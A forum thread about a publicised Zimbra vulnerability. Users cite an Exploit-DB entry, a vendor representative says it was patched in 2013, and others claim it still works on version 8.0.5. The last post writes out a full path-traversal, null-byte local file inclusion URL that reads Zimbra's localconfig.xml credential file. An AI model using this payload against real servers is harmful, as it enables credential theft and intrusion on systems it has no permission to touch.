zimbra 0-day

[maumar]

It was published on Exploits Database by Offensive Security, I suppose you are aware of it, in this case sorry

[phoenix]

[quote user="maumar"]It was published on Exploits Database by Offensive Security, I suppose you are aware of it, in this case sorry[/QUOTE]Please file this in bugzilla.

[MKC]

If anybody's interested, I've analyzed the bug and developed an independent fix for it.

I've posted everything on my blog, which sadly is in French.
I haven't taken the time to translate all this, but if some users or people working on Zimbra want to know more about what I did, just get in touch with me

[quanah]

Hi,
Thank you for sharing your research. These issues were resolved with a patch for our 7.2.2 and 8.0.2 and subsequent releases in February of 2013.
--Quanah

[MKC]

The exploit was advertised as a 0day, and I took the author's word for it.

I feel silly now, sorry about this!

[dik23]

Better a false alarm than no alarm

[anndro]

I updated my zimbra to 8.0.5 but exploid still working. Here is some quick fix for protection in Turkish but i think it can help,
http://www.bilgiguvenligi.gov.tr/kritik ... iklik.html

[phoenix]

[quote user="anndro"]I updated my zimbra to 8.0.5 but exploid still working. Here is some quick fix for protection in Turkish but i think it can help,[/QUOTE]If you think this exploit still exists then file a report in bugzilla.

[dik23]

Please could you post the big here so I can subscribe to it?
Thanks

[expert_az]

I can confirm ,LFI working on last 8.0.5 and after 7.2.2
LFI is located at :

/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
http://www.exploit-db.com/exploits/30085/